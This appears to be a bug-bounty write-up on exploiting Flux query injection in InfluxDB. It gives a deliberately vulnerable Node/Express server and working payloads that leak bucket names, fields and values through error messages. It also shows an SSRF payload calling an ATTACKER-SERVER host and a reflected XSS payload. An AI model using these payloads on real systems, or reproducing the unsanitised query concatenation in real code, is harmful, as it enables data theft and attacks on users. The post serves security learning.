InfluxDB NoSQL Injection
How do I developed an NoSQL Injection exploit for InfluxDB
In this post, I'll share my experience of discovering a NoSQL Injection vulnerability in a Bug Bounty program in a non-popular database within the hacking community.
During the initial discovery, I was expecting to find a good blog post or tool teaching how to exploit NoSQL Injection on InfluxDB, but this was not the case, so I needed to understand how this database works to develop payload techniques to leak data from it.
Furthermore, I'll explain how I took advantage of it to find an XSS and SSRF.
What is InfluxDB
InfluxDB is a popular open-source time series database that is designed for handling high volumes of timestamped data. InfluxDB is widely used for monitoring and analyzing metrics, events, and real-time data from various sources such as sensors, applications, and IoT devices.
Initial Vulnerability Discovery
During the WEB application analysis, I received the following error after sending the character " in a query parameter of the URL:
error @1:115-1:118: got unexpected token in string expression @1:118-1:118: EOF
This looked like a lot a injection issue, and after searching on Google, I concluded that the backend was using InfluxDB.
At this point, I started reading the documentation (https://docs.influxdata.com/influxdb/v2.7/) trying to figure out what is happening in the backend.
InfluxDB NoSQL Queries
This is a simple example of an InfluxDB NoSQL query:
from(bucket: "example-bucket")
|> range(start: -1h)
|> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag")
The given InfluxDB query retrieves data from the "example-bucket" within the last hour and filters the data based on specific conditions.
Here's a breakdown of each part of the query:
from(bucket: "example-bucket")
: This part specifies the source bucket from which the data will be retrieved. InfluxDB organizes data into buckets, and here, the data will be fetched from the "example-bucket." Buckets are like database names in SQL languages.|> range(start: -1h)
: This part sets the time range for the data retrieval. Therange
function is used to define a time window. In this case, it specifies the last hour of data from the current time. The parameterstart: -1h
means the data will be fetched from one hour ago until the current time.|> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag")
: This part applies a filter to the data based on certain conditions. Thefilter
function is used to select specific data points that meet the defined criteria. Thefilter()
performs operations similar to theSELECT
statement and theWHERE
clause in SQL-like languages.
In summary, the query fetches data from the "example-bucket" within the last hour and filters the data to include only those data points that belong to the measurement "example-measurement" and have a tag with the key "tag" and value "example-tag."
Building a Vulnerable WEB Application
After knowing the syntax, it's time to build our vulnerable application to finally build a working proof of concept on real-world applications.
The following code is a vulnerable server example:
const express = require('express');
const {InfluxDB, Point} = require('@influxdata/influxdb-client')
const app = express();
const token = 'REDACTED' // InfluxDB Token
const url = 'https://127.0.0.1' // Local Database endpoint
const org = 'myOrg'
const bucket = 'publicBucket'
const client = new InfluxDB({url, token})
async function query(fluxQuery) {
results = []
queryApi = client.getQueryApi(org)
for await (const {values, tableMeta} of queryApi.iterateRows(fluxQuery)) {
o = tableMeta.toObject(values)
console.log(o)
results.push(o)
}
return results
}
app.get('/query', async (req, res) => {
try {
const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
result = await query(fluxQuery)
res.send(result)
} catch (err) {
res.send(err.toString())
}
});
const port = 3000;
app.listen(port, () => {
console.log(`Server started on port ${port}`);
});
In the above example, the server is concatenating a user-supplied input at ' + req.query.data + '
to the InfluxDB query without any sanitization:
const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
result = await query(fluxQuery)
And by sending an HTTP request containing the character " that will escape the string sequence of the query, we can confirm that it returns the same error previously seen in the Bug Bounty program server:
Building The Payload
Leaking Bucket Names
As said earlier, on InfluxDB, bucket names are like database names on other SQL languages, and like an SQL Injection exploitation process, it's crucial to find a way to leak these bucket names to get access to the entire database.
After carefully reading the documentation, and supposing that the injection occurs at the filter function, I achieved the following Error-based NoSQLI payload:
") |> yield(name: "1337")
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name))
//
The
buckets()
function lists all the buckets from the current database.The
filter()
function uses ther.name
expression to filter for bucket names, which ther
is the result of the buckets query, andname
is a field returned in thebuckets()
function.As you can see, the InfluxDB queries support regex with the
=~
operation, so the logic behind the conditionr.name =~ /^a.*/
is that it will betrue
if a bucket name starts with the lettera
.After that, the filter uses a
and
condition that calls thedie()
function with the value of the bucket name as a parameter. Thedie()
function throws an error with a custom message passed in the first parameter, which will leak the bucket name.The payload is also using the
yield()
function before the buckets query. This is necessary to perform "multiple queries" in a single request on InfluxDB.Finally, it's necessary to separate the
yield()
from the buckets query with a new line, and at the end of the payload, I added the//
expression after another new line to comment everything after our injection.
Resuming, if a bucket name that starts with the letter a
exists in the database, it will trigger the die()
function that will leak the bucket name in the error message. If no bucket starts with the sent letter, the server will return an empty output with no errors.
Trying on our vulnerable application we can see that no errors returned with the letter a
:
But sending the same payload with the letter p
leaks the bucket name privateBucket
:
To leak all bucket names it's necessary to test all characters, adding another sequence after matching (for example pa
, pb
, pc
...).
Leaking The Bucket Field Names
Now that we have the names of the buckets we can try to fetch their contents, but like other SQL languages, sometimes we need to specify the column names to query specific data, and in this section, I will show a technique to leak these column names in InfluxDB.
During dynamic analysis, I was able to find a payload that triggers an error containing the data structure of any bucket:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => die(msg:r))
//
The above payload uses a similar technique, using the yield()
function and adding a comment at the end of the payload:
The payload now uses the
from()
function to fetch the data of the leaked bucket name, therange()
which is necessary, and finally thefilter()
.In the
filter()
function, I calleddie()
again, but now sending the entire result abject as a parameter. Since thedie()
function only accepts strings as parameters and the result object contains all the bucket data structure, the server will trigger a verbose error leaking it.
As you can see in the above screenshot, the server leaked this structure:
_value: B,
_time: time,
_stop: time,
_start: time,
_measurement: string,
_field: string
Now that we know the query structure, we can use a regex comparison to force an error to leak all field names:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field =~ /s.*/ and die(msg:r._field))
//
As we can see, the vulnerable app leaked the field name sensitive_field
because it matched the regex condition r._field =~ /s.*/
.
Leaking Field Values
After leaking all field names, we can try to leak field values. Field values are the "final node" of InfluxDB, it's where the data is stored, in other words, leaking the values is the last step of the exploitation. To do that we can use the same technique used to leak the field names, but now specifying the field that we want to retrieve:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:r._value))
//
By sending the above payload, the server responded with an error:
HttpError: runtime error @2:54-2:124: filter: type conflict: string != int
This occurs because the data stored on r._value
is an integer and the die()
function only accepts strings. To circumvent that, we can use the string()
function to convert the integer value to a string, successfully leaking it in the error message:
") |> yield(name: "1337")
from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:string(v:r._value)))
//
As we can see in the above screenshot, the value of the sensitive_field
is 1337
. This means that we were able to fetch arbitrary data from other buckets!
InfluxDB Server-Side Request Forgery
While reading the documentation I noticed that some InfluxDB functions accept a host
parameter, one of these functions is from()
:
By sending the host
parameter in the from()
function we can make HTTP requests to arbitrary URLs. The following payload is an example of an SSRF using the NoSQL Injection vulnerability:
") |> yield(name: "1337")
from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0)
//
And this is the request received by my Burp Collaborator:
If the vulnerable application is using a local InfluxDB database, it's also possible to fetch internal endpoints.
This is not a vulnerability from InfluxDB, this is just a feature being abused by a NoSQL Injection that was raised from an insecure coding practice.
InfluxDB Cross-Site Scripting
Our example server is also prone to Reflected XSS attacks via the NoSQL Injection:
app.get('/query', async (req, res) => {
try {
const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0) |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
result = await query(fluxQuery)
res.send(result)
} catch (err) {
res.send(err.toString())
}
});
If you have an XSS radar like me, you notice that when an error occurs in the InfluxDB query, the try{ } catch{ }
statement sends the error back to the client with the Content-Type
equals to text/html
, allowing the browser load HTML and JavaScript.
Furthermore, we can control some data that is reflected in these errors, especially via the die()
function:
Since the query API uses the GET method, it's possible to execute arbitrary JavaScript on the victim's browsers by sending a malicious link:
") die(msg:"<img src=x onerror=alert(document.domain)>")//
This is not an InfluxDB vulnerability because the issue raises from a NoSQL Injection caused by an insecure coding practice and an insecure default Content-Type by NodeJS.
Conclusion
In this blog post, I described my exploit development process of a NoSQL Injection vulnerability in a non-popular database within the hacking community and how I leveraged this issue to achieve an SSRF and XSS.